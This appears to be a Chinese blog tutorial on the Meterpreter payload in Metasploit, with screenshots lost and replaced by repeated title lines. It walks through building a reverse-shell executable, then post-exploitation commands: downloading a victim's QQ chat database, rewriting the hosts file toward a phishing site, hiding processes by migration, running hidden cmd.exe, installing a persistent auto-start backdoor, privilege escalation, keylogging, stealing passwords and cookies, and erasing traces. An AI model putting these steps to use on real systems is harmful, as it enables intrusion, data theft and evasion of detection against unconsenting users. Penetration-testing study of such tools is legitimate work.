MSF(Metasploit)中的Meterpreter组件

Meterpreter(内网渗透范畴)

Meterpreter是MSF框架中的一个扩展模块,作为溢出成功以后的攻击荷载使用,攻击荷载在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell链接。
Meterpreter shell作为渗透模块有很多有用的功能:
比如添加用户、隐藏东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。
Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Meterpreter模块使用
利用kali生成反弹shell的执行程序
MSF(Metasploit)中的Meterpreter组件MSF(Metasploit)中的Meterpreter组件
怎样在kali上传下载文件?
CRT上传下载。。。
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
之后双击met.exe并运行
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件

开始监听:
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
类似于反弹shell,区别在于它还支持meterpreter的语法
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
直接查看文件内容,可以用来查看敏感文件
MSF(Metasploit)中的Meterpreter组件
查看当前工作路径
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
反斜杠表示转义
MSF(Metasploit)中的Meterpreter组件
下载文件
MSF(Metasploit)中的Meterpreter组件
download C:\“Program Files”\Tencent\QQ\Users\123*456\Msg2.0.db /root/ 把目标主机上的QQ聊天记录下载到攻击主机的root目录下(是否要考虑变更你的QQ程序的安装路径了呢?)
修改并且查看文件
MSF(Metasploit)中的Meterpreter组件
例如修改目标主机上的hosts文件,使得目标主机访问baidu时去到准备好的钓鱼网站。路径C:\WINDOWS\system32\drivers\etc\hosts
DNS解析:缓存——》hosts文件——》DNS服务器

search命令,在目标主机文件系统上查找搜索文件

MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
portfwd命令,端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
route命令,显示目标主机的主机路由表
MSF(Metasploit)中的Meterpreter组件
查看meterpreter注入到目标主机的进程所属用户
MSF(Metasploit)中的Meterpreter组件
查看目标的主机系统信息
MSF(Metasploit)中的Meterpreter组件
查看目标主机上运行的进程信息,结合migrate使用
MSF(Metasploit)中的Meterpreter组件
migrate,将meterpreter会话移植到另一个进程
例如反弹的meterpreter会话是对方打开了一个你预置特殊代码的word文档而产生的,那么对方一旦关闭掉该word文档,我们获取到的meterpreter会话就会随之关闭,所以把会话进程注入到explorer.exe是一个好办法
MSF(Metasploit)中的Meterpreter组件
muma.exe消失
MSF(Metasploit)中的Meterpreter组件
execute命令,在目标主机上运行某个程序
例如我们目前注入进程到explorer.exe后,运行用户为超级管理员administrator。我们运行以下目标主机上的记事本程序
MSF(Metasploit)中的Meterpreter组件
这样太明显,如果希望隐藏后台执行,加参数-H
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
我们运行目标主机上的cmd.exe程序,并以隐藏的方式直接交互到我们的meterpreter会话上。
命令:execute -H -i -f cmd.exe类似shell
MSF(Metasploit)中的Meterpreter组件
在目标主机内存中直接执行我们攻击主机上的攻击程序,比如wce.exe(获取密码hash值),又比如木马等,这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀

获得meterpreter会话在目标主机上注入进程的进程号
MSF(Metasploit)中的Meterpreter组件
shutdown命令:关闭目标主机

后渗透模块post/windows/gather/forensics/enum_drives调用 有问题
在获取meterpreter会话session后,调用post/windows/gather/forensics/enum_drives,可获取目标主机存储器信息

或者直接在meterpreter会话中以命令
run post/windows/gather/forensics/enum_drives调用
MSF(Metasploit)中的Meterpreter组件
确定目标主机是否是一台虚拟机:run post/windows/gather/checkvm
如果目标主机是虚拟机,那么渗透意义不大
MSF(Metasploit)中的Meterpreter组件
persistence后渗透模块向目标主机植入后门程序
命令:run persistence -X -i 5 -p 攻击者监听端口 -r攻击者监听的服务器地址
-X在目标主机上开机自启
-i不断尝试反向连接的时间间隔
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
后门程序:
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
提权命令getsystem

MSF(Metasploit)中的Meterpreter组件
键盘记录功能
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
系统账号密码获取:
MSF(Metasploit)中的Meterpreter组件
获取目标主机上的软件安装信息
MSF(Metasploit)中的Meterpreter组件
获取目标主机上最近访问过的文档、链接信息
MSF(Metasploit)中的Meterpreter组件
读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码
MSF(Metasploit)中的Meterpreter组件
MSF(Metasploit)中的Meterpreter组件
入侵痕迹擦除
MSF(Metasploit)中的Meterpreter组件

上一篇:win7 sp1 提权实验


下一篇:android RelativeLayout 动态设置高度